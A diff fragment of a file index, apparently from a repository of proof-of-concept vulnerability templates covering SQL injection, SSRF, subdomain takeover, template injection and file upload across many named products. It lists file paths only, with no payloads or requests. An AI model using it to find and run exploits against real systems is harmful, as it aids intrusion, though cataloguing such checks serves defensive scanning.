./poc/sql/yongyou-u8-oa-sqli-11746.yaml @@ -92697,7 +92723,9 @@ ./poc/sql/yonyou-nc-PaWfm-sqli.yaml ./poc/sql/yonyou-nc-complainbilldetail-sqli.yaml ./poc/sql/yonyou-nc-down-bill-sqli.yaml +./poc/sql/yonyou-nc-downtax-sqli.yaml ./poc/sql/yonyou-nc-runStateServlet-sqli.yaml +./poc/sql/yonyou-nc-warningdetailinfo-sqli.yaml ./poc/sql/yonyou-nc-workflowImageServlet-sqli.yaml ./poc/sql/yonyou-u8-cloud-ExportUfoFormatAction-sqli.yaml ./poc/sql/yonyou-u8-oa-sqli-11748.yaml @@ -92723,7 +92751,6 @@ ./poc/sql/z-url-preview-cb5a7484dbd994ed6e7ac4e9b63a5368.yaml ./poc/sql/zabbix-cve-2016-10134-sqli.yml ./poc/sql/zarzadzanie_kontem-8ddb37c6c3ab472d4eda177c23c07e30.yaml -./poc/sql/zcms-v3-sqli-11773.yaml ./poc/sql/zcms-v3-sqli-11774.yaml ./poc/sql/zcms-v3-sqli-11775.yaml ./poc/sql/zcms-v3-sqli.yml @@ -92756,7 +92783,6 @@ ./poc/sql_injection/74cms-show-sqli.yaml ./poc/sql_injection/74cms-sqli-1.yaml ./poc/sql_injection/74cms-sqli-1.yml -./poc/sql_injection/74cms-sqli-10.yaml ./poc/sql_injection/74cms-sqli-2.yaml ./poc/sql_injection/74cms-sqli-2.yml ./poc/sql_injection/74cms-sqli-8.yaml @@ -92954,7 +92980,6 @@ ./poc/sql_injection/PHPOK-SQLi.yaml ./poc/sql_injection/PHPSHE-SQLi.yaml ./poc/sql_injection/Qibocms-SQLi.yaml -./poc/sql_injection/SQLInjection_ERROR.yaml ./poc/sql_injection/SQL_injection-Authentification.yaml ./poc/sql_injection/SQL_injection-Error.yaml ./poc/sql_injection/SQL_injection-Numeric.yaml @@ -93027,7 +93052,6 @@ ./poc/sql_injection/dahua-wpms-searchjson-sqli .yaml ./poc/sql_injection/dedecms-guestbook-sqli.yaml ./poc/sql_injection/dedecms-guestbook-sqli.yml -./poc/sql_injection/dedecms-membergroup-sqli-6796.yaml ./poc/sql_injection/dedecms-membergroup-sqli-6797.yaml ./poc/sql_injection/dedecms-membergroup-sqli-6798.yaml ./poc/sql_injection/dedecms-membergroup-sqli-6799.yaml @@ -93073,6 +93097,7 @@ ./poc/sql_injection/etouch-v2-sqli-7266.yaml ./poc/sql_injection/etouch-v2-sqli-7267.yaml ./poc/sql_injection/etouch-v2-sqli-7268.yaml +./poc/sql_injection/etouch-v2-sqli.yaml ./poc/sql_injection/etouch-v2-sqli.yml ./poc/sql_injection/exposed-sqlite-manager-1.yaml ./poc/sql_injection/exposed-sqlite-manager-2.yaml @@ -93126,7 +93151,7 @@ ./poc/sql_injection/kevinlab-bems-sqli-8457.yaml ./poc/sql_injection/kevinlab-bems-sqli-8458.yaml ./poc/sql_injection/kevinlab-bems-sqli-8459.yaml -./poc/sql_injection/kevinlab-bems-sqli.yaml +./poc/sql_injection/kevinlab-bems-sqli-8460.yaml ./poc/sql_injection/landray-eis-rpt-listreport-definefield-sqli.yaml ./poc/sql_injection/leaguemanager-sqli.yaml ./poc/sql_injection/mcms-list-do-sqli.yaml @@ -93186,7 +93211,6 @@ ./poc/sql_injection/sqli_error.yaml ./poc/sql_injection/sqli_header-10504.yaml ./poc/sql_injection/sqli_header.yaml -./poc/sql_injection/sqliheader.yaml ./poc/sql_injection/stackposts-sqli.yaml ./poc/sql_injection/test-jsp-sqli.yaml ./poc/sql_injection/time-based-sqli.yaml @@ -93246,20 +93270,18 @@ ./poc/sql_injection/wp-advanced-search-sqli.yaml ./poc/sql_injection/wp-fastest-cache-sqli.yaml ./poc/sql_injection/wp-plugin-statistics-sqli.yaml -./poc/sql_injection/wuzhicms-sqli-11656.yaml ./poc/sql_injection/wuzhicms-sqli-11657.yaml ./poc/sql_injection/wuzhicms-sqli-11658.yaml ./poc/sql_injection/wuzhicms-sqli-11659.yaml ./poc/sql_injection/wuzhicms-v410-sqli.yaml ./poc/sql_injection/wuzhicms-v410-sqli.yml -./poc/sql_injection/xdcms-sqli-11664.yaml ./poc/sql_injection/xdcms-sqli-11665.yaml ./poc/sql_injection/xdcms-sqli-11666.yaml ./poc/sql_injection/xdcms-sqli-11667.yaml -./poc/sql_injection/xdcms-sqli.yaml ./poc/sql_injection/yongyou-ICurrtype-sqli.yaml ./poc/sql_injection/yongyou-KSOA-servletimagefield-sKeyvalue-sqli.yaml ./poc/sql_injection/yongyou-U8-sqli.yaml +./poc/sql_injection/yongyou-icurrtype-sqli.yaml ./poc/sql_injection/yongyou-u8-oa-sqli-11746.yaml ./poc/sql_injection/yongyou-u8-oa-sqli-11747.yaml ./poc/sql_injection/yongyou-u8-oa-sqli.yaml @@ -93276,7 +93298,9 @@ ./poc/sql_injection/yonyou-nc-PaWfm-sqli.yaml ./poc/sql_injection/yonyou-nc-complainbilldetail-sqli.yaml ./poc/sql_injection/yonyou-nc-down-bill-sqli.yaml +./poc/sql_injection/yonyou-nc-downtax-sqli.yaml ./poc/sql_injection/yonyou-nc-runStateServlet-sqli.yaml +./poc/sql_injection/yonyou-nc-warningdetailinfo-sqli.yaml ./poc/sql_injection/yonyou-nc-workflowImageServlet-sqli.yaml ./poc/sql_injection/yonyou-u8-cloud-ExportUfoFormatAction-sqli.yaml ./poc/sql_injection/yonyou-u8-oa-sqli-11748.yaml @@ -93291,7 +93315,6 @@ ./poc/sql_injection/yungoucms-sqli.yaml ./poc/sql_injection/yungoucms-sqli.yml ./poc/sql_injection/zabbix-cve-2016-10134-sqli.yml -./poc/sql_injection/zcms-v3-sqli-11773.yaml ./poc/sql_injection/zcms-v3-sqli-11774.yaml ./poc/sql_injection/zcms-v3-sqli-11775.yaml ./poc/sql_injection/zcms-v3-sqli.yml @@ -93500,10 +93523,11 @@ ./poc/ssrf/blind_ssrf.yaml ./poc/ssrf/cloudflare-image-ssrf-1020.yaml ./poc/ssrf/cloudflare-image-ssrf-1021.yaml +./poc/ssrf/cloudflare-image-ssrf-1022.yaml ./poc/ssrf/cloudflare-image-ssrf-1023.yaml ./poc/ssrf/confluence-ssrf-sharelinks-1190.yaml ./poc/ssrf/confluence-ssrf-sharelinks-1191.yaml -./poc/ssrf/confluence-ssrf-sharelinks-1193.yaml +./poc/ssrf/confluence-ssrf-sharelinks-1192.yaml ./poc/ssrf/confluence-ssrf-sharelinks-1194.yaml ./poc/ssrf/custom-microsoft-ssrf-detect.yaml ./poc/ssrf/custom-weblogic-SSRF-detect.yaml @@ -93516,7 +93540,6 @@ ./poc/ssrf/gitlab-ssrf-cve-2021-22214.yml ./poc/ssrf/hasura-graphql-ssrf-7903.yaml ./poc/ssrf/hasura-graphql-ssrf-7904.yaml -./poc/ssrf/hasura-graphql-ssrf-7905.yaml ./poc/ssrf/hasura-graphql-ssrf-7906.yaml ./poc/ssrf/hasura-graphql-ssrf.yaml ./poc/ssrf/header-blind-ssrf.yaml @@ -93537,11 +93560,10 @@ ./poc/ssrf/linkerd-ssrf-detect.yaml ./poc/ssrf/microstrategy-ssrf-1.yaml ./poc/ssrf/microstrategy-ssrf-2.yaml -./poc/ssrf/microstrategy-ssrf-8859.yaml -./poc/ssrf/microstrategy-ssrf-8861.yaml +./poc/ssrf/microstrategy-ssrf-8860.yaml ./poc/ssrf/microstrategy-ssrf.yaml ./poc/ssrf/office-webapps-ssrf.yaml -./poc/ssrf/openbmcs-ssrf.yaml +./poc/ssrf/openbmcs-ssrf-9261.yaml ./poc/ssrf/openfire-cve-2019-18394-ssrf.yml ./poc/ssrf/poc-yaml-vmware-vcenter-ssrf.yaml ./poc/ssrf/request-backets-ssrf.yaml @@ -93555,7 +93577,6 @@ ./poc/ssrf/ssrf-fuzz.yaml ./poc/ssrf/ssrf-injection.yaml ./poc/ssrf/ssrf-via-oauth-misconfig-10525.yaml -./poc/ssrf/ssrf-via-oauth-misconfig-10526.yaml ./poc/ssrf/ssrf-via-oauth-misconfig-10527.yaml ./poc/ssrf/ssrf-via-proxy.yaml ./poc/ssrf/ssrf-vuln-params.yaml @@ -93568,14 +93589,16 @@ ./poc/ssrf/ssrf_nagli.yaml ./poc/ssrf/targa-camera-ssrf-10656.yaml ./poc/ssrf/targa-camera-ssrf-10657.yaml -./poc/ssrf/targa-camera-ssrf-10658.yaml +./poc/ssrf/targa-camera-ssrf.yaml ./poc/ssrf/umbraco-base-ssrf-1.yaml -./poc/ssrf/umbraco-base-ssrf-10880.yaml +./poc/ssrf/umbraco-base-ssrf-10881.yaml ./poc/ssrf/umbraco-base-ssrf-10882.yaml ./poc/ssrf/umbraco-base-ssrf-2.yaml ./poc/ssrf/umbraco-base-ssrf-3.yaml ./poc/ssrf/vmware-vcenter-ssrf-11051.yaml ./poc/ssrf/vmware-vcenter-ssrf-11052.yaml +./poc/ssrf/vmware-vcenter-ssrf-11053.yaml +./poc/ssrf/vmware-vcenter-ssrf.yaml ./poc/ssrf/vmware-vrealize-cve-2021-21975-ssrf.yml ./poc/ssrf/w3c-total-cache-ssrf-11078.yaml ./poc/ssrf/w3c-total-cache-ssrf-11079.yaml @@ -93592,39 +93615,41 @@ ./poc/ssrf/wp-multiple-theme-ssrf-11510.yaml ./poc/ssrf/wp-multiple-theme-ssrf-11511.yaml ./poc/ssrf/wp-multiple-theme-ssrf-11512.yaml +./poc/ssrf/wp-multiple-theme-ssrf-11513.yaml ./poc/ssrf/wp-plugin-canto-ssrf.yaml ./poc/ssrf/wp-under-construction-ssrf.yaml ./poc/ssrf/wso2-ssrf.yaml ./poc/ssrf/xfh-ssrf.yaml ./poc/ssrf/xmlrpc-pingback-ssrf-11686.yaml -./poc/ssrf/xmlrpc-pingback-ssrf-11687.yaml ./poc/ssrf/xmlrpc-pingback-ssrf-11688.yaml +./poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml ./poc/ssrf/xmlrpc-pingback-ssrf-11690.yaml ./poc/ssrf/xmlrpc-pingback-ssrf.yaml +./poc/ssrf/yongyou-ssrf-11745.yaml ./poc/ssrf/yongyou-ssrf.yaml ./poc/ssrf/zimbra-preauth-ssrf-11809.yaml ./poc/ssrf/zimbra-preauth-ssrf-11810.yaml -./poc/ssrf/zimbra-preauth-ssrf.yaml +./poc/ssrf/zimbra-preauth-ssrf-11811.yaml ./poc/ssrf/zzzcms-ssrf.yaml ./poc/subdomain_takeover/account-takeover-via-registration.yaml ./poc/subdomain_takeover/acquia-takeover-34.yaml +./poc/subdomain_takeover/acquia-takeover-35.yaml ./poc/subdomain_takeover/acquia-takeover.yaml ./poc/subdomain_takeover/aftership-takeover-202.yaml -./poc/subdomain_takeover/aftership-takeover-204.yaml +./poc/subdomain_takeover/aftership-takeover-203.yaml ./poc/subdomain_takeover/aftership-takeover-205.yaml ./poc/subdomain_takeover/aftership-takeover-206.yaml -./poc/subdomain_takeover/agilecrm-takeover-208.yaml ./poc/subdomain_takeover/agilecrm-takeover-209.yaml ./poc/subdomain_takeover/agilecrm-takeover-210.yaml ./poc/subdomain_takeover/agilecrm-takeover-211.yaml ./poc/subdomain_takeover/aha-takeover-213.yaml +./poc/subdomain_takeover/aha-takeover-214.yaml ./poc/subdomain_takeover/aha-takeover-215.yaml -./poc/subdomain_takeover/aha-takeover-216.yaml ./poc/subdomain_takeover/aha-takeover-217.yaml ./poc/subdomain_takeover/airee-takeover-226.yaml -./poc/subdomain_takeover/airee-takeover-227.yaml +./poc/subdomain_takeover/airee-takeover-228.yaml ./poc/subdomain_takeover/airee-takeover.yaml -./poc/subdomain_takeover/anima-takeover-318.yaml +./poc/subdomain_takeover/anima-takeover-317.yaml ./poc/subdomain_takeover/anima-takeover-319.yaml ./poc/subdomain_takeover/anima-takeover-320.yaml ./poc/subdomain_takeover/anima-takeover.yaml @@ -93632,35 +93657,34 @@ ./poc/subdomain_takeover/announcekit-takeover-323.yaml ./poc/subdomain_takeover/announcekit-takeover-324.yaml ./poc/subdomain_takeover/announcekit-takeover.yaml +./poc/subdomain_takeover/aws-bucket-takeover-630.yaml ./poc/subdomain_takeover/aws-bucket-takeover-631.yaml -./poc/subdomain_takeover/aws-bucket-takeover-632.yaml ./poc/subdomain_takeover/aws-bucket-takeover.yaml -./poc/subdomain_takeover/azure-takeover-detection-681.yaml ./poc/subdomain_takeover/azure-takeover-detection-682.yaml ./poc/subdomain_takeover/azure-takeover-detection-683.yaml ./poc/subdomain_takeover/azure-takeover-detection.yaml -./poc/subdomain_takeover/bigcartel-takeover-727.yaml ./poc/subdomain_takeover/bigcartel-takeover-728.yaml +./poc/subdomain_takeover/bigcartel-takeover-729.yaml ./poc/subdomain_takeover/bigcartel-takeover.yaml ./poc/subdomain_takeover/bitbucket-takeover-738.yaml ./poc/subdomain_takeover/bitbucket-takeover-739.yaml ./poc/subdomain_takeover/bitbucket-takeover-741.yaml ./poc/subdomain_takeover/bitbucket-takeover.yaml -./poc/subdomain_takeover/brightcove-takeover-783.yaml ./poc/subdomain_takeover/brightcove-takeover-784.yaml +./poc/subdomain_takeover/brightcove-takeover-785.yaml ./poc/subdomain_takeover/brightcove-takeover.yaml ./poc/subdomain_takeover/campaignmonitor-takeover.yaml ./poc/subdomain_takeover/canny-takeover-854.yaml ./poc/subdomain_takeover/canny-takeover-856.yaml ./poc/subdomain_takeover/canny-takeover-857.yaml ./poc/subdomain_takeover/canny-takeover.yaml +./poc/subdomain_takeover/cargo-takeover-866.yaml ./poc/subdomain_takeover/cargo-takeover-867.yaml -./poc/subdomain_takeover/cargo-takeover-868.yaml ./poc/subdomain_takeover/cargo-takeover-869.yaml ./poc/subdomain_takeover/cargo-takeover.yaml ./poc/subdomain_takeover/cargocollective-takeover-862.yaml ./poc/subdomain_takeover/cargocollective-takeover-863.yaml -./poc/subdomain_takeover/cargocollective-takeover-865.yaml +./poc/subdomain_takeover/cargocollective-takeover-864.yaml ./poc/subdomain_takeover/cargocollective-takeover.yaml ./poc/subdomain_takeover/ceros-takeover.yaml ./poc/subdomain_takeover/detect-all-takeover.yaml @@ -93674,19 +93698,18 @@ ./poc/subdomain_takeover/feedpress-takeover-7458.yaml ./poc/subdomain_takeover/feedpress-takeover.yaml ./poc/subdomain_takeover/flexbe-takeover-7504.yaml -./poc/subdomain_takeover/flexbe-takeover-7506.yaml +./poc/subdomain_takeover/flexbe-takeover-7505.yaml ./poc/subdomain_takeover/flexbe-takeover.yaml ./poc/subdomain_takeover/flywheel-takeover-7525.yaml +./poc/subdomain_takeover/flywheel-takeover-7526.yaml ./poc/subdomain_takeover/flywheel-takeover.yaml -./poc/subdomain_takeover/flywheel_takeover.yaml ./poc/subdomain_takeover/freshdesk-takeover-7540.yaml -./poc/subdomain_takeover/freshdesk-takeover-7541.yaml ./poc/subdomain_takeover/freshdesk-takeover.yaml ./poc/subdomain_takeover/freshservice-takeover.yaml ./poc/subdomain_takeover/frontify-takeover-7543.yaml ./poc/subdomain_takeover/frontify-takeover-7544.yaml ./poc/subdomain_takeover/frontify-takeover.yaml -./poc/subdomain_takeover/gemfury-takeover-7577.yaml +./poc/subdomain_takeover/gemfury-takeover-7576.yaml ./poc/subdomain_takeover/gemfury-takeover-7578.yaml ./poc/subdomain_takeover/gemfury-takeover-7579.yaml ./poc/subdomain_takeover/gemfury-takeover.yaml @@ -93695,9 +93718,9 @@ ./poc/subdomain_takeover/getresponse-takeover-7609.yaml ./poc/subdomain_takeover/getresponse-takeover-7610.yaml ./poc/subdomain_takeover/getresponse-takeover.yaml +./poc/subdomain_takeover/ghost-takeover-7619.yaml ./poc/subdomain_takeover/ghost-takeover-7620.yaml ./poc/subdomain_takeover/ghost-takeover-7621.yaml -./poc/subdomain_takeover/ghost-takeover-7622.yaml ./poc/subdomain_takeover/ghost-takeover.yaml ./poc/subdomain_takeover/gitbook-takeover-7626.yaml ./poc/subdomain_takeover/gitbook-takeover.yaml @@ -93708,58 +93731,55 @@ ./poc/subdomain_takeover/github-takeover-7662.yaml ./poc/subdomain_takeover/github-takeover-7663.yaml ./poc/subdomain_takeover/github-takeover.yaml +./poc/subdomain_takeover/hatenablog-takeover-7907.yaml ./poc/subdomain_takeover/hatenablog-takeover-7908.yaml ./poc/subdomain_takeover/hatenablog-takeover-7909.yaml -./poc/subdomain_takeover/hatenablog-takeover-7910.yaml ./poc/subdomain_takeover/hatenablog-takeover.yaml ./poc/subdomain_takeover/helpjuice-takeover-7925.yaml -./poc/subdomain_takeover/helpjuice-takeover-7927.yaml +./poc/subdomain_takeover/helpjuice-takeover-7926.yaml ./poc/subdomain_takeover/helpjuice-takeover-7928.yaml ./poc/subdomain_takeover/helpjuice-takeover.yaml +./poc/subdomain_takeover/helprace-takeover-7929.yaml ./poc/subdomain_takeover/helprace-takeover-7930.yaml ./poc/subdomain_takeover/helprace-takeover-7931.yaml -./poc/subdomain_takeover/helprace-takeover-7932.yaml ./poc/subdomain_takeover/helprace-takeover.yaml ./poc/subdomain_takeover/helpscout-takeover-7933.yaml -./poc/subdomain_takeover/helpscout-takeover-7934.yaml +./poc/subdomain_takeover/helpscout-takeover-7935.yaml ./poc/subdomain_takeover/helpscout-takeover-7936.yaml ./poc/subdomain_takeover/helpscout-takeover.yaml +./poc/subdomain_takeover/heroku-takeover-7941.yaml ./poc/subdomain_takeover/heroku-takeover-7942.yaml ./poc/subdomain_takeover/heroku-takeover-7943.yaml ./poc/subdomain_takeover/heroku-takeover.yaml -./poc/subdomain_takeover/hubspot-takeover-8078.yaml +./poc/subdomain_takeover/hubspot-takeover-8077.yaml ./poc/subdomain_takeover/hubspot-takeover-8079.yaml ./poc/subdomain_takeover/hubspot-takeover.yaml ./poc/subdomain_takeover/intercom-takeover-8166.yaml -./poc/subdomain_takeover/intercom-takeover-8167.yaml ./poc/subdomain_takeover/intercom-takeover-8168.yaml ./poc/subdomain_takeover/intercom-takeover-8169.yaml ./poc/subdomain_takeover/intercom-takeover.yaml ./poc/subdomain_takeover/jazzhr-takeover-8233.yaml +./poc/subdomain_takeover/jazzhr-takeover-8234.yaml ./poc/subdomain_takeover/jazzhr-takeover-8235.yaml ./poc/subdomain_takeover/jazzhr-takeover.yaml ./poc/subdomain_takeover/jetbrains-takeover-8292.yaml ./poc/subdomain_takeover/jetbrains-takeover-8293.yaml -./poc/subdomain_takeover/jetbrains-takeover-8294.yaml ./poc/subdomain_takeover/jetbrains-takeover.yaml ./poc/subdomain_takeover/kinsta-takeover-8492.yaml ./poc/subdomain_takeover/kinsta-takeover-8493.yaml -./poc/subdomain_takeover/kinsta-takeover-8494.yaml ./poc/subdomain_takeover/kinsta-takeover.yaml -./poc/subdomain_takeover/landingi-takeover-8567.yaml +./poc/subdomain_takeover/landingi-takeover-8566.yaml ./poc/subdomain_takeover/landingi-takeover.yaml ./poc/subdomain_takeover/launchrock-takeover-8602.yaml ./poc/subdomain_takeover/launchrock-takeover-8603.yaml -./poc/subdomain_takeover/launchrock-takeover-8604.yaml -./poc/subdomain_takeover/launchrock-takeover-8605.yaml ./poc/subdomain_takeover/launchrock-takeover.yaml ./poc/subdomain_takeover/leadpages-takeover.yaml ./poc/subdomain_takeover/locomotivetakeover.yaml +./poc/subdomain_takeover/mashery-takeover-8783.yaml ./poc/subdomain_takeover/mashery-takeover-8784.yaml -./poc/subdomain_takeover/mashery-takeover-8785.yaml ./poc/subdomain_takeover/mashery-takeover-8786.yaml ./poc/subdomain_takeover/mashery-takeover.yaml -./poc/subdomain_takeover/medium-takeover-8797.yaml +./poc/subdomain_takeover/medium-takeover-8798.yaml ./poc/subdomain_takeover/medium-takeover.yaml ./poc/subdomain_takeover/meteor-takeover.yaml ./poc/subdomain_takeover/netlify-takeover-9042.yaml @@ -93767,43 +93787,46 @@ ./poc/subdomain_takeover/netlify-takeover.yaml ./poc/subdomain_takeover/ngrok-takeover-9126.yaml ./poc/subdomain_takeover/ngrok-takeover-9127.yaml +./poc/subdomain_takeover/ngrok-takeover-9128.yaml ./poc/subdomain_takeover/ngrok-takeover-9129.yaml ./poc/subdomain_takeover/ngrok-takeover.yaml ./poc/subdomain_takeover/pagewiz-takeover.yaml ./poc/subdomain_takeover/pantheon-takeover-9458.yaml ./poc/subdomain_takeover/pantheon-takeover-9459.yaml ./poc/subdomain_takeover/pantheon-takeover-9460.yaml +./poc/subdomain_takeover/pantheon-takeover-9461.yaml ./poc/subdomain_takeover/pantheon-takeover.yaml ./poc/subdomain_takeover/pingdom-takeover-9584.yaml ./poc/subdomain_takeover/pingdom-takeover-9585.yaml ./poc/subdomain_takeover/pingdom-takeover-9587.yaml ./poc/subdomain_takeover/pingdom-takeover.yaml ./poc/subdomain_takeover/proposify-takeover-9693.yaml -./poc/subdomain_takeover/proposify-takeover-9694.yaml ./poc/subdomain_takeover/proposify-takeover-9695.yaml ./poc/subdomain_takeover/proposify-takeover-9696.yaml ./poc/subdomain_takeover/proposify-takeover.yaml +./poc/subdomain_takeover/readme-takeover-9841.yaml ./poc/subdomain_takeover/readme-takeover-9842.yaml -./poc/subdomain_takeover/readme-takeover-9843.yaml ./poc/subdomain_takeover/readme-takeover.yaml +./poc/subdomain_takeover/readthedocs-takeover-9844.yaml ./poc/subdomain_takeover/readthedocs-takeover-9845.yaml ./poc/subdomain_takeover/readthedocs-takeover-9846.yaml -./poc/subdomain_takeover/readthedocs-takeover-9847.yaml ./poc/subdomain_takeover/readthedocs-takeover.yaml +./poc/subdomain_takeover/s3-subtakeover-9967.yaml ./poc/subdomain_takeover/s3-subtakeover-9968.yaml ./poc/subdomain_takeover/s3-subtakeover-9969.yaml ./poc/subdomain_takeover/s3-subtakeover.yaml +./poc/subdomain_takeover/shopify-takeover-10201.yaml ./poc/subdomain_takeover/shopify-takeover-10202.yaml ./poc/subdomain_takeover/shopify-takeover-10203.yaml ./poc/subdomain_takeover/shopify-takeover-10204.yaml ./poc/subdomain_takeover/shopify-takeover.yaml ./poc/subdomain_takeover/short-io-takeover.yaml +./poc/subdomain_takeover/simplebooklet-takeover-10271.yaml ./poc/subdomain_takeover/simplebooklet-takeover-10272.yaml ./poc/subdomain_takeover/simplebooklet-takeover-10273.yaml -./poc/subdomain_takeover/simplebooklet-takeover-10274.yaml ./poc/subdomain_takeover/simplebooklet-takeover.yaml ./poc/subdomain_takeover/smartjob-takeover-10322.yaml -./poc/subdomain_takeover/smartjob-takeover-10323.yaml +./poc/subdomain_takeover/smartjob-takeover-10324.yaml ./poc/subdomain_takeover/smartjob-takeover-10325.yaml ./poc/subdomain_takeover/smartjob-takeover.yaml ./poc/subdomain_takeover/smartling-takeover-10326.yaml @@ -93812,10 +93835,11 @@ ./poc/subdomain_takeover/smugmug-takeover-10338.yaml ./poc/subdomain_takeover/smugmug-takeover-10340.yaml ./poc/subdomain_takeover/smugmug-takeover.yaml -./poc/subdomain_takeover/sprintful-takeover-10494.yaml +./poc/subdomain_takeover/sprintful-takeover-10495.yaml ./poc/subdomain_takeover/sprintful-takeover.yaml ./poc/subdomain_takeover/strikingly-takeover-10549.yaml ./poc/subdomain_takeover/strikingly-takeover-10550.yaml +./poc/subdomain_takeover/strikingly-takeover-10551.yaml ./poc/subdomain_takeover/strikingly-takeover.yaml ./poc/subdomain_takeover/subdomain-takeOver.yaml ./poc/subdomain_takeover/subdomain-takeover-dns-wildcards.yaml @@ -93823,55 +93847,54 @@ ./poc/subdomain_takeover/subdomain-takeover.yaml ./poc/subdomain_takeover/surge-takeover-10579.yaml ./poc/subdomain_takeover/surge-takeover.yaml -./poc/subdomain_takeover/surveygizmo-takeover-10582.yaml +./poc/subdomain_takeover/surveygizmo-takeover-10581.yaml ./poc/subdomain_takeover/surveygizmo-takeover-10583.yaml ./poc/subdomain_takeover/surveygizmo-takeover-10584.yaml ./poc/subdomain_takeover/surveygizmo-takeover.yaml ./poc/subdomain_takeover/surveysparrow-takeover.yaml ./poc/subdomain_takeover/takeover-checker.yaml -./poc/subdomain_takeover/tave-takeover-10659.yaml ./poc/subdomain_takeover/tave-takeover-10660.yaml ./poc/subdomain_takeover/tave-takeover-10661.yaml +./poc/subdomain_takeover/tave-takeover-10662.yaml ./poc/subdomain_takeover/tave-takeover.yaml -./poc/subdomain_takeover/teamwork-takeover-10669.yaml +./poc/subdomain_takeover/teamwork-takeover-10668.yaml ./poc/subdomain_takeover/teamwork-takeover-10670.yaml ./poc/subdomain_takeover/teamwork-takeover-10671.yaml ./poc/subdomain_takeover/teamwork-takeover.yaml ./poc/subdomain_takeover/tictail-takeover-10766.yaml -./poc/subdomain_takeover/tictail-takeover-10767.yaml -./poc/subdomain_takeover/tictail-takeover-10769.yaml +./poc/subdomain_takeover/tictail-takeover-10768.yaml ./poc/subdomain_takeover/tictail-takeover.yaml ./poc/subdomain_takeover/tilda-takeover-10781.yaml ./poc/subdomain_takeover/tilda-takeover-10782.yaml -./poc/subdomain_takeover/tilda-takeover-10784.yaml +./poc/subdomain_takeover/tilda-takeover-10783.yaml ./poc/subdomain_takeover/tilda-takeover.yaml +./poc/subdomain_takeover/tumblr-takeover-10845.yaml ./poc/subdomain_takeover/tumblr-takeover-10846.yaml -./poc/subdomain_takeover/tumblr-takeover-10847.yaml ./poc/subdomain_takeover/tumblr-takeover.yaml +./poc/subdomain_takeover/uberflip-takeover-10864.yaml ./poc/subdomain_takeover/uberflip-takeover-10865.yaml ./poc/subdomain_takeover/uberflip-takeover-10866.yaml -./poc/subdomain_takeover/uberflip-takeover-10867.yaml ./poc/subdomain_takeover/uberflip-takeover.yaml ./poc/subdomain_takeover/unbounce-takeover-10970.yaml ./poc/subdomain_takeover/unbounce-takeover.yaml ./poc/subdomain_takeover/uptimerobot-takeover-10986.yaml +./poc/subdomain_takeover/uptimerobot-takeover-10987.yaml ./poc/subdomain_takeover/uptimerobot-takeover-10988.yaml -./poc/subdomain_takeover/uptimerobot-takeover-10989.yaml ./poc/subdomain_takeover/uptimerobot-takeover.yaml ./poc/subdomain_takeover/urge-takeover-10991.yaml ./poc/subdomain_takeover/urge-takeover.yaml ./poc/subdomain_takeover/uservoice-takeover.yaml ./poc/subdomain_takeover/vend-takeover-10996.yaml -./poc/subdomain_takeover/vend-takeover-10997.yaml +./poc/subdomain_takeover/vend-takeover-10998.yaml ./poc/subdomain_takeover/vend-takeover-10999.yaml ./poc/subdomain_takeover/vend-takeover.yaml ./poc/subdomain_takeover/vercel-takeover-11001.yaml ./poc/subdomain_takeover/vercel-takeover.yaml -./poc/subdomain_takeover/webflow-takeover-11131.yaml ./poc/subdomain_takeover/webflow-takeover-11132.yaml ./poc/subdomain_takeover/webflow-takeover-11133.yaml +./poc/subdomain_takeover/webflow-takeover-11134.yaml ./poc/subdomain_takeover/webflow-takeover.yaml -./poc/subdomain_takeover/wishpond-takeover-11216.yaml +./poc/subdomain_takeover/wishpond-takeover-11215.yaml ./poc/subdomain_takeover/wishpond-takeover-11217.yaml ./poc/subdomain_takeover/wishpond-takeover-11218.yaml ./poc/subdomain_takeover/wishpond-takeover.yaml @@ -93888,17 +93911,18 @@ ./poc/subdomain_takeover/wpsite-background-takeover-27e55b32604a97373f48c9d933458e81.yaml ./poc/subdomain_takeover/wpsite-background-takeover.yaml ./poc/subdomain_takeover/wufoo-takeover-11648.yaml -./poc/subdomain_takeover/wufoo-takeover-11649.yaml +./poc/subdomain_takeover/wufoo-takeover-11650.yaml ./poc/subdomain_takeover/wufoo-takeover-11651.yaml ./poc/subdomain_takeover/wufoo-takeover.yaml ./poc/subdomain_takeover/zendesk-takeover-11780.yaml +./poc/subdomain_takeover/zendesk-takeover-11781.yaml ./poc/subdomain_takeover/zendesk-takeover-11782.yaml -./poc/subdomain_takeover/zendesk-takeover-11783.yaml ./poc/subdomain_takeover/zendesk-takeover.yaml ./poc/template_injection/ScanSSTI.yaml ./poc/template_injection/hidden-ssti.yaml ./poc/template_injection/jeecg-boot-ssti.yaml ./poc/template_injection/node-nunjucks-ssti.yaml +./poc/template_injection/pdf-signer-ssti-to-rce-9470.yaml ./poc/template_injection/pdf-signer-ssti-to-rce-9471.yaml ./poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml ./poc/template_injection/pdf-signer-ssti-to-rce.yaml @@ -94051,7 +94075,6 @@ ./poc/upload/exposed-jquery-file-upload-7313.yaml ./poc/upload/exposed-jquery-file-upload-7314.yaml ./poc/upload/exposed-jquery-file-upload-7315.yaml -./poc/upload/exposed-jquery-file-upload.yaml ./poc/upload/fanruan-finereport-v9-design-save-svg-fileupload.yaml ./poc/upload/fanruan-oa-v9-designsavevg-upload-file.yaml ./poc/upload/fanwei-e-office-v10-fileupload.yaml @@ -94125,8 +94148,8 @@ ./poc/upload/krsp-frontend-file-upload-plugin.yaml ./poc/upload/krsp-frontend-file-upload.yaml ./poc/upload/landray-eis-saveimg-fileupload.yaml -./poc/upload/luftguitar-arbitrary-file-upload-8672.yaml ./poc/upload/luftguitar-arbitrary-file-upload-8673.yaml +./poc/upload/luftguitar-arbitrary-file-upload.yaml ./poc/upload/magicflu-mailupdate-jsp-fileupload.yaml ./poc/upload/magn-html5-drag-and-drop-media-uploader-006e5f1d4e64f8fa5e922d39952f36b6.yaml ./poc/upload/magn-html5-drag-and-drop-media-uploader-65b90b5afd371997ac4afce08583c91d.yaml @@ -94204,7 +94227,7 @@ ./poc/upload/oa-v9-uploads-file-9187.yaml ./poc/upload/oa-v9-uploads-file-9188.yaml ./poc/upload/oa-v9-uploads-file-9189.yaml -./poc/upload/oa-v9-uploads-file-9190.yaml +./poc/upload/oa-v9-uploads-file-9191.yaml ./poc/upload/pc4uploader.yaml ./poc/upload/pigcms-manage-admin-fileupload.yaml ./poc/upload/powercreator-arbitrary-file-upload.yaml @@ -94280,6 +94303,7 @@ ./poc/upload/showdoc-file-upload-rce-10226.yaml 